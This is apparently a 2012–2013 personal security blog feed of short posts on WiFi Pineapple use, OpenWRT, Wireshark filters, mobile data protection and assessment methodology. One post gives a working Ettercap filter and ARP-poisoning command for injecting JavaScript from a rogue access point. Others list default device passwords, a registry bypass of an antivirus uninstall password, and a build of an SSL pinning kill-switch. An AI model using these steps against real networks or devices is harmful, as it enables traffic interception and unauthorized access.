greenoperator

hak5 - Wireless Pineapple - URLSnarf infusion

Tue, 21 May 2013 19:18:38 -0400

The wireless pineapple, is a very nifty device to have and experiment with. Many times on my assessment work, I am interested in seeing if an application is making any network calls using HTTP. The pineapple and URLSnarf make this task very easy to check.

I know, I know… I could launch BurpSuite or any other proxy, update the proxy settings in the device and lauch the application. Although this would work, it is not as quick as just connecting to the pineapple over karma and then starting the URLSnarf infusion!

The infusion is simple, easy, and effective. Prior to starting the infusion, there is a simple configuration that must be performed. The appropriate interface to listen on must be configured. Many times I had forgotten to update the interface and wondered why the infusion did not function properly.

Steps to use the infusion

1. Begin by powering up the pineapple and waiting for WAN, LAN, and USB LEDs to illuminate.

2. Through the testing device, connect to the administration panel of the pineapple.
In a browser navigate to: 172.16.42.1 and authenticate using the username root and the password which you configured. The default password is: pineapplesareyummy

3. Navigate to the Pineapple bar where you can find a list of all the infusions avaialble. If URLSnarf is not already installed, follow the instructions to install it. Click on the URLSnarf link to navigate to the infusion.

4. Ensure that the appropriate interface is selected. The interface that should be shown is br-lan. This assumes that you have the pineapple hooked up to a PC and the interface on the PC is bridged to another interface with ICS enabled.

5. Click the start button to start executing the infusion. The Output tab will show a message urlsnarf is running.

6. Start an application on your mobile device. If all goes well, the traffic will be shown. The URL at least :)

OpenWRT entering failsafe mode using windows

Fri, 17 May 2013 15:08:52 -0400

Have you made any updates to your OpenWRT device and it is acting up? Well you have a chance to fix it by entering into the failsafe mode. Follow the steps below and you can telnet into the device if required to make modifications to the configuration.

Short instructions are:
1. Configure windows PC with address
IP Address: 192.168.1.10
Subnet Mask: 255.255.0.0
Gateway: 192.168.1.1
2. Opened a command prompt window and ran PING -t -w 5 192.168.1.1
3. Pulled the power cable from the router and then hooked it up again.
4. Your PC will get some replies from the router… look out for the DMZ LED lighting up.
5. Hold the Reset button for a few seconds….
6. If it works, you will continue to get responses from your router and you will see in your command prompt window
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
7. When the responses come and don’t stop… Then you are in failsafe mode and you can telnet in, else repeat the process…

Don't lose your caffeine buzz to cybercrime

Tue, 14 May 2013 14:25:00 -0400

I love infographics, they present a log of information in a concise easy to understand visual that is both educational and entertaining. I ran into the below infographic from ThreatMetrix and thought it applied to many of us, as we frequently visit various coffee shops in our neighborhoods.

citation: www.threatmetrix.com

Creating Large Files for Testing Procedures

Mon, 13 May 2013 13:19:00 -0400

Creating arbitrarily large text files using command line

Description

Based on business need web applications allow end-users to upload various types of files. The applications must have controls in place to accept allowed file type extensions and must have file size limitations to prevent nefarious users from attacking a system’s availability or legit users from uploading large files accidentally which can impact the system’s availability.

Security Domains Addressed

The SWFScan tool can be used to identify and test an array of vulnerabilities for web traffic between the flash application and backend web servers. The security domains which can be tested for are identified given the OWASP Top 10 list for 2010:

• A1: Injection

• A6: Security Misconfiguration

How to create a large file

The only tool required to create large files in Microsoft Windows is the command line. The only component required for creating the files is a starting file and a loop construct that will append the data to create a larger file.

The format of a loop construct in the Microsoft Windows command line is:

for <iterations definition> do <action>

The iterations of a loop are based on a counter which starts from a value x and counts until value y; the rate at which the counter increments is the step amount for the loop. The syntax in the command for defining the loop parameters is: (counter start, step amount, counter end)

Example 1 – Set a loop to run from 1 to 10 stepping on each value.

for /L %i in (1,1,10) do <action>

Example 2 – Set a loop to run from 1 to 10 stepping by 2; it executes 5 times.

for /L %i in (1,2,10) do <action>

NOTE: The action to be performed by a loop can be any command that is executable in Microsoft Windows command line.

Example 3 – Create a loop that prints the index of the loop for /L %i in (1,1,10) do echo %i

Using the looping constructs available in the command line is a powerful tool for creating large files.

The steps to create arbitrarily large files follow:

1. Use notepad to create a file with 100 A values and save it as fileA.txt

2. Check the directory the file is saved into to confirm the file is present. A text file with 100 bytes length should be present.

3. Write a for loop to concatenate the file 10 times.

4. Check the directory the file is saved into and confirm a new file is created named largefile.txt. The file size should be 1000 bytes long given the original file was 100 bytes and we had 10 iterations.

5. Changing the number of times the loop iterates will impact the size of the larger file.

6. Repeat step 4 to see the file size of the new file created. The file size is now 11,000 bytes given we iterated 1000 times. Feeding the process a larger input file will increase the size of the file faster.

Summary

The contents of this document have provided guidance how large text files can be created by using tools that are part of a standard Microsoft Windows workstation, e.g. Notepad and command line. By combining the principles of looping and command line file handling one can quickly and easily generate large text files that otherwise would not be possible to create using notepad alone or using any other editor.

Using Bash to download multiple files

Thu, 04 Apr 2013 15:15:52 -0400

Ever need to download a series of files which have a similar name, indexed with a number, but did not want to save each one, one at a time?

Writing a for loop in Bash can help solve this issue very quickly.

In my case, wget was not available on my machine, thus curl was used to download the files.

The bash command looked as follows, where URL was the sites path where the images were stored:

for i in {1..59}; do curl -o “slide—$i—1024.jpg” “<URL>/slide-$i-1024.jpg”; done

Wireshark Filters for Wireless packets

Mon, 01 Apr 2013 10:32:02 -0400

Capture filters for Wireshark when reviewing 802.11 packets.

The frames are broken up into types and subtypes.

Frame type    Filter Statement
Management Frames     wlan.fc.type == 0
Control Frames               wlan.fc.type == 1
Data Frames                   wlan.fc.type == 2

Frame sub type     Filter Statement
Association Request     wlan.fc.type_subtype == 0
Association Request     wlan.fc.type_subtype == 1
Probe Request              wlan.fc.type_subtype == 4
Probe Response           wlan.fc.type_subtype == 5
Beacon                         wlan.fc.type_subtype == 8
Authentication              wlan.fc.type_subtype == 11
De-authentication          wlan.fc.type_subtype == 12

Steps to unlock your iPhone

Fri, 25 Jan 2013 14:47:00 -0500

iPhone Unlocking Instructions:

1. Press *#06# to find your iPhone’s IMEI number; the number will be 16 characters long

2. Provider your IMEI to an unlocking service and wait for a response that your device is unlocked.

3. Now do the following below:

- Then, install last version of iTunes
- Make sure your itunes is the latest version
- Connect phone to iTunes with not accepted (not valid) SIM
- Wait until itunes detects phone
- Now disconnect your iPhone and then reconnect after 10 seconds.
- Phone Unlocked. Once unlocked, your device will show the below image

Note: In some cases the device may not show the above screen and may ask for to be re-activated when you insert the new SIM.

Don’t worry if the above screenshot is not displayed, you phone will still be unlocked after it completes the activation process.

Disable Java in the Browser

Sat, 19 Jan 2013 12:02:00 -0500

Java’s unlimited supply of zero day exploits raises the question if we need to have Java on our machines. The most likely answer is probably no, however there are many reasons to have Java running on your machine.

If Java has to be installed on your device, then ensure that the Java plugin is not enabled within your browser. This is important because, if your system is running an older version of Java or an up to date version of Java, which may have zero days, then your system is at risk of being compromised. As a user, all it takes is to browse to a site that uses a Java applet to provide some functionality. This can be the entry way for the bad guys into your system.

The easiest way to block Java from the browser is to update to the most current version of Java or a version after Version 7 Update 11 (build 1.7.0_11-b21). The reason for this is because the Java control panel found inside of the Microsoft Windows Control panel allows an easy way to disable Java’s support in the browser.

The steps to disable Java in the browser are shown below.

1. Navigate to your Microsoft Windows Control panel. How you get to this varies a bit on each version of Windows, but it is accessible from the Start button.

2. From the Control Panel, look for the Java settings and double click it to open.

3. If you have the most recent version of Java installed, or a version newer than the one posted above, then the below option will be available. Click the link.

4. On the Security tab disable the “Enable Java content in the browser” checkbox.

5. Click the Apply button to apply the change.

6. Click OK on the confirmation window. Close any open browsers and restart them to ensure the setting is in effect.

Enjoy a more safe browsing experience!

Toyota/Scion Key Fab Battery Replacement

Sat, 19 Jan 2013 10:19:00 -0500

My girlfriends key had stopped functioning several months ago and became a paper weight. She called the Toyota dealership in her neighborhood and they asked for over $100 dollars to look at it and fix it. I decided to try to take it apart and replace the battery as the red LED was not very faint indicating a battery issue.

Below follow the steps to take the key apart and get to the battery. The only supplies required are a small flat head screw driver and a CR2016 battery.

1. Pick up the key and rotate it until you find a little gap where the screwdriver is used to pry the key casing open.

Hold the key as shown in the image below.

The hitch to pry the key fab case open is found above the trunk release button.

The housing pops off revealing the guts of the key.

2. After the case is pried of, the key will house the actual key electronics in an internal unit. Rotate the key and the internal unit should just fall out. If it does not, use the screw driver to lift it out of the key housing.

4. The key electronics are stuffed inside a plastic casing. As shown in the image below, there is an arrow indicating how to pry the plastic casing. Use the flat head screw driver to losen the casing. There are some clips around the rest of the housing which pop off fairly easy once you get started.

Opened casing reveals the battery of the key.

5. Take out the battery from the key fab and replace it with the new one.

New battery in place!

6. The lights on the fab are lighting up! Success. (Image below doesn’t show the LED on as I didn’t capture an image of this.

7. Reverse the steps to put the key together.

Hopefully the steps can help you replace your battery in the Toyota/Scion key and save you some money!

BleachBit

Fri, 07 Dec 2012 14:22:51 -0500

BleachBit quickly frees disk space and tirelessly guards your privacy. Free cache, delete cookies, clear Internet history, shred temporary files, delete logs, and discard junk you didn’t know was there. Designed for Linux and Windows systems, it wipes clean 90 applications including Firefox, Internet Explorer, Adobe Flash, Google Chrome, Opera, Safari,and more. Beyond simply deleting files, BleachBit includes advanced features such as shredding files to prevent recovery, wiping free disk space to hide traces of files deleted by other applications, and vacuuming Firefox to make it faster. Better than free, BleachBit is open source.

sudo apt-get install bleachbit

Source

Flush DNS in Windows and MacOSX

Fri, 30 Nov 2012 20:33:49 -0500

Looking to flush your DNS on your Microsoft Windows or Apple MacOSX 10.5+ machine? Its easier than you may think. DNS requests are usually cached by your machine to help speed up subsequent requests, but in many cases you may be interested in flushing the cache in order to ensure you are connecting to the updated or correct IP address.

To flush the DNS cache on each of the Windows and Apple machine, open the command prompt for each and execute the commands as shown.

Microsoft Windows: ipconfig /flushdns
Apple MacOSX 10.5+: dscacheutil - flushcache

Unhiding ~/Library directory on OSX 10.7 and 10.8

Wed, 14 Nov 2012 12:24:34 -0500

Mac OS 10.7 and 10.8 hide by default the ~/Library directory.

To unhide it, execute the below command in the command prompt or terminal.

chflags nohidden ~/Library

The presentation at DerbyCon 2012 by Chris Jenks on hardening a...

Mon, 05 Nov 2012 11:23:00 -0500

The presentation at DerbyCon 2012 by Chris Jenks on hardening a Linux system, is a very good summary of the basic controls to implement on in order to harden a system.

Android versus iOS Data Protection Stand

Thu, 11 Oct 2012 07:53:00 -0400

Please find below a bit of my understanding of data protection controls available on the Android and iOS mobile operating systems. If you see that I have something is wrong, please bring it to my attention to address it.

Storage of credentials on iOS and Android mobile operating systems

The iOS and Android operating systems have been in our lives for several years. Although they both made their presence about the same time, each has evolved differently. iOS has had a controlled flow of major operating system releases occurring approximately once every twelve months with minor updates throughout the year if required. This has led to a less fragmented ecosystem of supported devices and operating system versions. The majority of the users update their device days after the new operating system is released as it is not dependent on the service providers. Android has continued to push forward with its releases of the Android operating system, but it has not been as controlled as iOS. Android has a much more fragmented ecosystem of devices as the users are relying on updates to be provided by the manufacturers or the service providers, which in many cases does not occur. The manufacturers are rushing to bring out the latest generation device in order to compete and do not update the older devices that in many cases have the capability to support the new operating system. Of course this impacts the security posture of the devices. Both the Android and iOS operating systems have been steadily maturing and hardening themselves with each generation of their operating system primarily because of the use of consumer devices in the enterprise.

iOS

With the release of the third generation iPhone (3GS), Apple supported full drive encryption at the hardware level. The encryption provided on the device does not allow a 3^rd party from extracting information from it when it is in a powered off state. If the device is powered on, then the low level boot operating system can be leveraged to inject a small program into the device and image the devices drive. Effectively, although the control did provide some level of security it was not very effective against all attacks. With the release of the iPhone4 and iOS4, the operating system was enhanced to include a Data Protection API that allows third party application developers to store their data in an encrypted format until the device is unlocked. The Data Protection API derives the decryption key using a Password-Based Key Derivation Function2 (PBKDF-2) and tied to the users passcode. The password used by the Mail app on the device is stored in the KeyChain, a secure container provided by the operating system, and is encrypted prior to placing it in this container by the operating system itself.

By default, all data used by an application developed by a third party developer is not encrypted, unless the developer has encrypted it explicitly, thus putting sensitive information at risk of being compromised. The mail application on the iOS devices protects the e-mail credentials, but does not provide any real protection for the other applications. Third party developers have the ability to use the security controls provided by the operating system to store their own information used by their application. Small pieces of data can be stored in the KeyChain while larger blocks of data should leverage the Data Protection API with a strong passcode. If the developers rely solely on the controls provided by the operating system, then their data is encrypted while the device is locked and if the device is unlocked, then the information is decrypted. Additional application specific encryption is recommended to ensure that the amount of time the data remains in clear-text format is minimized. Using a strong passcode will help defend against open source tools available for download that can brute force weak passcodes such as using a PIN to decode the data stored in the keychain and the devices flash memory.

Android

Android in its initial releases did not provide strong controls to enable third party developers to protect their data. The credentials for the mail application and other applications were stored in clear-text in a SQLite database. Android did not support full drive encryption until its release of Android 3.0 (Honeycomb), in February 2011, which was primarily targeted for tablet devices and Android 4.0 (Ice Cream Sandwich), in October 2011, which supported phone devices. With the support of boot-time, on-the-fly decryption, the data stored on the devices internal storage drive is encrypted. Data stored on the SD Card is not protected and can be readily available to anyone who reviews it. Just as in iOS the encryption of the devices is based on the passcode/lock screen pattern. Use of the lock screen pattern does not provide much security as it is a 9-bit value which can easily be bruteforced in a fairly short period of time, thus it is recommended that a strong passcode is used to ensure data is not easily extracted from the device’s internal storage media. The passcode is derived by a salted Password-Based Key Derivation2 Function (PBKDF-2), thus an offline attack of the key would need to be performed and then tried against the device partition to extract an image.

Data used by applications on the device did not provide much security. Until recently, credentials from system and many third party developed applications was stored in an SQLite database or Shared Preferences file that is accessible only to the application which requires it, given that each application at installation creates a new user on the device, thus providing application isolation. The issue however is that if a device is “rooted/jailbroken”, then a rogue application has root access and can read the data in any directory of the device. Android does not provide any API for encrypting data other than the full file-system encryption/decryption that is performed and discussed above. An AccountManager is available and provided by Android, but it is not very secure as it stores the password as clear-text.

Conclusion

Although each platform has been making strides in the right direction towards strengthening their security posture, it still remains that users information is at risk. Passwords even for applications provided by the system such as mail can be compromised if the appropriate encryption is not present. Specifically, for the Android operating system, the mail system credentials are stored on the device in clear-text and are at a greater risk of compromise than those from Apple’s iOS. In short, third party developers must ensure that they provide their own encryption for any sensitive data that is to be stored on the devices and cannot solely rely on the controls provided by the operating system their applications run on. Later versions of the devices and operation systems do provided full drive or file system encryption, but its security is based on the strength of the passcode the users created. It is highly recommended that devices are managed by a mobile device management (MDM) system to ensure that the appropriate security profiles are configured to support strong passcodes as these are the keystone in the encryption used by the devices.

Q-See Low-cost home CCTV system and default credentials

Thu, 30 Aug 2012 12:31:00 -0400

Q-See offers cheap home CCTV systems which can be purchased at most electronic stores. The systems allows for capturing video from various CCTV cameras on a hard drive. In almost all cases the DVR system uses Linux to as the operating system.

I decided to scan my device with nmap and discovered ports are open; the most interesting port listening was port 23 (telnet).

After few minutes of searching Google a short list of default Q-See passwords was compiled. The passwords discovered where: <blank>, 88888888, 12345, 123456.

Each of the passwords was tried, my device’s root default password was 123456.

Check your environment, whether at home or enterprise, to ensure devices such as the above listed one are not available with the default passwords.

Impersonating Access Points and Injecting JavaScript

Tue, 28 Aug 2012 13:12:00 -0400

Abstract

Devices with a Wi-Fi radio on board are always looking to be connected. Mobiles devices have a yearning to be connected. By exploiting this functionality, a malicious user or can impersonate an otherwise safe network and take control of the network that the device has connected to. Using a consumer-grade access point with modifications to the firmware, we will be able to manipulate the unencrypted traffic which is traversing the access point’s network, although the tool can be configured to modify and inject code for a secure connection (SSL connection). Clients however would see a warning message.

Introduction

Many wireless devices persist the list of wireless networks they have connected to in the past. On the Microsoft Windows Operating system this list of networks is called the “Preferred Networks”. When the operating system is booted and if the Wi-Fi network interface is enabled, the operating system will begin transmitting specifically crafted packets called a probe request frame. These request frames are responsible for determining which access points are in range; they belong of the Management Frames defined in the 802.11 specification. Two types of probe requests are sent: generic probe requests, to determine all Access Points available in range, along with specific probe requests for each of the networks in the Preferred Network List.

Vulnerability

Devices broadcasting their Preferred Network List by trying to identify if a network is in range put themselves in a position that may allow an attacker to impersonate a network. An attacker can configure an Access Point to respond with Probe Response frames that indicates to the probing devices they can associate with it. This forces the probing devices to connect to the impersonated network where an attacker can capture and manipulate the traffic. More advanced attacks can also be launched to distribute malware or attempt to compromise the end-user machines.

Hardware

Any consumer grade wireless router supporting custom firmware can be flashed with an open-source custom firmware. Most consumer grade wireless routers are loaded with a Linux-like operating system. For this attack the specific piece of hardware used was an Alfa AP121-8MB access point.

Fig 1 – Image of hardware used for hacker challenge

Software

The access point used in the attack supports custom firmware as it runs an operating system that is for embedded devices; the operating system is a Linux distribution which allows for modular deployment of various packages.

The software installed on the device for the hacker challenge was the modified Jasager software from wifipineapple.com.

The software tools required to launch the attack and inject HTML code were already preloaded on the device.

The only tools required for use on the flash were ettercap and karma.

Configuration

NOTE: All the configuration details required to set up the impersonating access point are covered in the document from last year’s hacker challenge. The device used for this year’s hacker challenge automated many of the configurations, this allowed for a quicker turn around in the implementation of the attack.

The device has two interfaces for configuring it. The device can be configured by a web interface which was installed when initially setting up the device, or through a command line interface which can be accessed using SSH. The preferred method of configuration for this attack was to use SSH.

The scenario’s configuration required the device to have a bridged connection to a live internet connection. This allowed all the clients of the network to get a live internet connection further making it appear to the clients as if nothing have occurred.

Attack

The attack was launched once the configuration of the device was complete; the rouge access point was deployed in the target environment. The access point does not require power from an outlet as it can be powered by a battery pack, however for this challenge an outlet was used as the target environment was the office.

Once clients were connected to the rogue network AP, we were then able to run Ettercap and perform an ARP poisoning attack. This was required to allow Ettercap to get visibility to the network traffic.

Ettercap has a feature that allows users to manipulate the traffic running through the device on which it is running on. This feature was used to write a short filter as it is called in Ettercap to inject JavaScript. The payload of this injection was harmless; it displayed an alert box on the end-users browser indicating that the code was successfully injected. The code then resides on the end-users browser cache until they clear the cache. The attack results in a cache poisoning attack. ;) The payloads which can be provided in the injection step can be malicious. They can harvest cookies from the browser, install a keylogger, and or even modify the structure of the page as it is displayed on the end-users browser to harvest PII data.

if (ip.proto == TCP && tcp.dst == 80)
{
   if (search(DATA.data, “Accept-Encoding”)) {
       replace(“Accept-Encoding”, “Accept-Rubbishh”);
       # note: replacement string is same length as original string
       msg(“zapped Accept-Encoding!\n”);
   }
}
if (ip.proto == TCP && tcp.src == 80)
{
    replace(“</head>”, “</head><script type="text/javascript">alert(‘jim was here’);</script>”);
    msg(“Code injected at </head>… injecting javascript\n”);
}

The code required to implement the attack was minimal and can be found below. It is the implementation of the Ettercap filter.

etterfilter myFilter.filter –o a.ef

The above filter was compiled into a binary format which Ettercap requires by executing the Etterfilter application.

ettercap –Tq –F a.ef –i br-lan –M ARP:remote // // -P autoadd

The filter is the used with Ettercap to launch the attack. The syntax used for Ettercap is:

The parameters provided to the application are:
-T                           - Launch app in text mode
-q                          - Do not be verbose
-F a.ef                    - Execute filter a.ef against all network traffic
-i br-lan                - Use interface br-lan on the access point
-M ARP:remote - Man In The Middle Attack using an ARP poison attack on all hosts on the network
// //                      - Empty filter; do not performing an attack against a specific target, perform on all
-P autoadd           - Execute the autoadd Ettercap plugin automatically to ARP poison new clients

Below are screenshots of the end user’s machine once they are attacked. If a different payload was used, then no indication would be present on the users browser.

Fig 2 – Browser when trying to visit cnn.com

Fig 3 – Evidence of injected code on HTML page

Conclusion

To conclude, a consumer grade low-cost access point was modified fairly simply using open-source tools available online to take over a network connection and inject malicious JavaScript to an end user’s browser. Given the environment is not a rich environment of users using Wi-Fi, we were not able to compromise the get additional users to join our network, however, if this was a more targeted attack which also introduced a de-authentication attach against network users, we could have more users connecting to our network.

Building iSecPartners ios-SSL-Kill-Switch tweak

Fri, 17 Aug 2012 15:07:00 -0400

For some time it has been a challenge to trap SSL traffic from iOS applications in a web proxy tools such as Fiddler or WebScarab. iOS application in many cases performed Certificate Pinning which checked for specific information within the SSL certificate before accepting allowing the application to complete a request.

While attending BlackHat 2012 in Las Vegas, I saw a talk from Alban Diquet which allowed for disabling the iOS operating system from validating the certificates. The solution is very simple and elegant! I never thought to think of writing an iOS MobileSubstrate tweak to turn off the validation! Especially after experimenting with tweaks for some time.

Below are the steps for building the tweak and installing it on a jailbroken iOS device.

1. Download the source code from the iSECPartners GitHub (https://github.com/iSECPartners/ios-ssl-kill-switch)

2. Assuming you have already installed THEOS on your system, execute the below steps to create the tweak.

3. There is actually a coding mistake in the github code that must be fixed prior to building the tweak. The fix is below and is part of the Tweak.xm file:

Original Code:

HookedNSURLConnectionDelegate* delegateProxy = [[HookedNSURLConnectionDelegate alloc] initWithOriginal: delegate];

Modified Code:

HookedNSURLConnectionDelegate* delegateProxy = [[HookedNSURLConnectionDelegate alloc] initWithOriginalDelegate: delegate];

This change has to be made in two locations; line 10 and line 21.

4. Once the change is made to the source code, we will make a new tweak in THEOS by executing: $THEOS/bin/nic.pl. NOTE: The menu displayed below may be slightly different depending on the version of THEOS that is installed.

NIC 1.0 - New Instance Creator
------------------------------
  [1.] iphone/application
  [2.] iphone/library
  [3.] iphone/preference_bundle
  [4.] iphone/tool
  [5.] iphone/tweak
Choose a Template (required):

5. Select the option that is iphone/tweak

6. Fill out the question in the form as specified below.

NOTE:

Field Author/Maintainer, I specified Alban’s name instead of mine as he’s the author of the tweak, but you can specify what you wish.
Field Package Name: I specified the original package as there are some hard coded paths within the code that reference it. I’d stick to the original one unless you are performing a huge modification to the code.

Choose a Template (required): 5
Project Name (required): ios-ssl-kill-switch-tweak
Package Name [com.yourcompany.ios-ssl-kill-switch-tweak]: com.isecpartners.nabla.sslkillswitch
Author/Maintainer Name [mac_user]: Alban Diquet
MobileSubstrate Bundle filter [com.apple.springboard]: 
Instantiating iphone/tweak in iossslkillswitchtweak/...
Done.

7. Navigate to the project directory that was created and open the file Tweak.xm

8. Paste the code from the original tweak with the updated fix on the lines mentioned in the previous step.

9. Copy the files HookedNSURLConnectionDelegate.h and HookedNSURLConnectionDelegate.m file to the tweak directory.

10. Copy the Makefile downloaded from GitHub and replace the one that was generated for us. If you wish to edit the contents of the file, then use the code found below

include theos/makefiles/common.mk

TWEAK_NAME = SSLKillSwitch
SSLKillSwitch_FILES = Tweak.xm HookedNSURLConnectionDelegate.m

SSLKillSwitch_FRAMEWORKS = UIKit
include $(THEOS_MAKE_PATH)/tweak.mk

11. Execute make package on the command line to build the tweak. If all went well, you will see the below output.

Making all for tweak SSLKillSwitch...
 Preprocessing Tweak.xm...
 Compiling Tweak.xm...
 Compiling HookedNSURLConnectionDelegate.m...
 Linking tweak SSLKillSwitch...
 Stripping SSLKillSwitch...
 Signing SSLKillSwitch...
Making stage for tweak SSLKillSwitch...
dpkg-deb: building package `com.isecpartners.nabla.sslkillswitch' in `./com.isecpartners.nabla.sslkillswitch_0.0.1-1_iphoneos-arm.deb'.

12. To clean the build execute make clean.

rm -rf ./obj
rm -rf "/opt/iossslkillswitchtweak/_"

Enjoy reviewing the iOS SSL traffic :)

Symantec Antivirus - Password Required for uninstall

Fri, 20 Apr 2012 14:44:26 -0400

Ran a across a couple machines this weekend which I was fixing for my friends and family which was out dated. The machines had outdated Symantec Antivirus installations from several years ago.

Tried to remove the software and was prompted for a password. Doh! Given I didn’t have this I needed to determine if this is something which can be bypassed.

When reviewing the registry I was able to identify a few registry values which I attempted to change. Turns out they worked to bypass the password for uninstall :)

Navigate to the registry and flip the below values from 1 to 0.

Registry path: HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\Administrator Only\Security\

UseVPUninstallPassword DWORD set to 0
UseScanNetDrivePassword DWORD set to 0
VPUninstallPassword set to blank

Mobile Application Assessment Series - Approach

Wed, 14 Mar 2012 13:49:12 -0400

It is very important to have an approach when performing mobile application assessments as it is for any other application assessment being performed. This will help to drive your work.

The approach I have been using for a few months seems to be working fairly well. The approach is comprised of two sections. All the assessments performed undergo a static analysis of the application installation file and a dynamic analysis or behavioral analysis of the application.

The analysis approach is the same across all mobile platforms. The tools used may differ, but the high-level idea is the same. The static analysis involves reviewing the application installation file which can be gotten off of a mobile application store such as Apple’s AppStore or Google’s marketplace or from a developer directly.

Mobile Platform Application Installation Extension
Apple iOS .ipa
Google Android .apk

The application installation file can store a wealth of information and should be reviewed to understand the structure of the application and the resources it uses.

The dynamic analysis of an application refers to the behavioral analysis of the application once it is installed on a mobile device and is executing. The application when running stars creating artifacts which can be left on the device’s internal storage memory or can be captured by performing a review of the data being transmitted between the mobile device and the backend systems.

In the next post we will begin to review the type of information which can be extracted from the IPA and APK files by performing a static analysis.

Mobile Application Assessment Series

Mon, 06 Feb 2012 16:37:00 -0500

As technology changes over time, it leads to new innovation and as the focus of developers and needs of end-users change, it can lead to a rise of new software being created. With the proliferation of smart phones, the consumer behavioral practices have pushed businesses to expose functionality from their business applications that are traditionally inside the businesses network perimeter to begin wondering outside of the perimeter. The network boundaries which use to protect data are now being stretched; the hard edge that defined what is inside the network versus what is not has become a gray area. The network perimeter has become notably more fluid. Specifically, smart phones with native applications have helped data spread across millions of user’s devices. Data wants to be free! Data does not want to be trapped. Thus data does its best to try and escape. Smart phones are currently a major medium that data is using to escape from its owners and controllers.

Businesses and mobile application developers appear to have forgotten every lesson that was learned over the last decade regarding building defensive and secure applications. The same issues which were present in web applications since the late nineties are manifesting themselves once again, elevating the risk of businesses and their sensitive information that is escaping.

Over the next several weeks I will focus on providing relevant mobile application assessment information for the iOS and Android platforms. First a framework for testing mobile applications will be presented followed by examples.

Stay tuned for the new series on testing mobile applications.